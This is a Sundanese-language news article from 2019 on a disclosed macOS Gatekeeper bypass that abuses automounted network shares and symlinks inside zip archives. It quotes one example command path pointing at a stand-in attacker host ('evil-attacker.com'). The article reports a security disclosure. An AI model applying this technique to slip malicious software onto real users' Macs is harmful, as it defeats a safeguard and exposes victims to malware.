Gampang masang aplikasi jahat dina Mac. Apple teu ngalereskeun kasalahan sanajan saatos tilu bulan

27. 5. 2019

Panaliti kaamanan Filippo Cavallarin masangkeun peringatan ngeunaan bug dina macOS 10.14.5 dina blogna. Ieu ngawengku kamungkinan lengkep bypassing ukuran kaamanan Gatekeeper urang. Numutkeun Cavallarin, anjeunna nunjukkeun kasalahan ka Apple dina bulan Pebruari taun ieu, tapi perusahaan henteu ngalereskeunana dina pembaruan pangénggalna.

Gatekeeper dikembangkeun ku Apple tur diasupkeun kana sistem operasi desktop na pikeun kahiji kalina dina 2012. Éta mékanisme nu nyegah hiji aplikasi tina ngajalankeun tanpa pangaweruh jeung idin pamaké. Saatos Anjeun undeur hiji aplikasi, Gatekeeper otomatis pariksa kode na pikeun nempo lamun software nu geus leres ditandatanganan ku Apple.

Dina postingan blog na, Cavallarin nyatakeun yén Gatekeeper, sacara standar, nganggap duanana panyimpenan éksternal sareng saham jaringan janten lokasi anu aman. Aplikasi naon waé anu aya dina udagan ieu tiasa diluncurkeun sacara otomatis tanpa kedah ngaliwat pamariksaan Gatekeeper. Ieu fitur ieu nu bisa dieksploitasi pikeun ngajalankeun software jahat tanpa pangaweruh pamaké.

Salah sahiji aspék anu ngamungkinkeun aksés anu teu diidinan nyaéta fitur automount, anu ngamungkinkeun para pangguna pikeun otomatis masang pangsa jaringan ngan saukur ku netepkeun jalur anu dimimitian ku "/ net /". Salaku conto, Cavallarin nyebatkeun jalur "ls /net/evil-attacker.com/sharedfolder/" anu tiasa nyababkeun sistem operasi ngamuat eusi folder "sharefolder" dina lokasi anu jauh anu tiasa berpotensi jahat.

Anjeun tiasa ningali kumaha ancaman jalanna dina pidéo:

Faktor séjén nyaéta kanyataan yén lamun arsip pos ngandung symlink husus ngarah kana fungsi automount dibagikeun, eta moal dipariksa ku Gatekeeper. Ku cara ieu, korban bisa kalayan gampang ngundeur arsip jahat jeung unzip eta, sahingga panyerang ngajalankeun ampir sagala software dina Mac tanpa pangaweruh pamaké. The Finder, anu nyumputkeun ekstensi tangtu sacara standar, ogé ngagaduhan bagian tina kerentanan ieu.

Cavallarin nyatakeun dina blog na yén Apple narik perhatian kana kerentanan sistem operasi macOS dina 22 Pebruari taun ieu. Tapi dina pertengahan Méi, Apple lirén komunikasi sareng Cavallarin, janten Cavallarin mutuskeun pikeun ngajantenkeun sadayana umum.

Sumber: FCVL

Topik: neundeun, otomatis, MacOS, video, Setélan, fungsi, pamaké, Aplikasi, apel

Sawala ngeunaan artikel

Nami anjeun

komentar anjeun

Ku ngeusian data di luhur, abdi ngaku yen parusahaan téks pabrik s.r.o., kantor didaptarkeun di Brno, Durďákova 336/29, Černá Kutub, kode pos: 613 00, ID nomer: 06157831, didaptarkeun di Pangadilan Daerah di Brno, bagian C , Lebetkeun 100399, bakal ngolah data pribadi kuring disadiakeun dina formulir pendaptaran dieusian ku kuring dina dasar kapentingan sah TEXT FACTORY s.r.o nurutkeun Pasal 6 ayat 1 hurup f) GDPR jeung pikeun minuhan kawajiban hukum (Pasal 6, ayat 1, hurup c) GDPR), pikeun tujuan di handap ieu: kabutuhan pikeun mastikeun otorisasina nu datang ka situs web dioperasikeun ku TEXT FACTORY s.r.o. pikeun aktip nyumbang kana artikel diterbitkeun atawa dina diskusi forum sareng ngalaksanakeun hak TEXT FACTORY s.r.o salaku pangurus forum diskusi ieu. Langkung seueur inpormasi ngeunaan ngolah data sareng hak pribadi tiasa dipendakan di Palajaran ngeunaan panyalindungan data pribadi. sakabéh téks

Bisa jadi kapentingan anjeun

Patali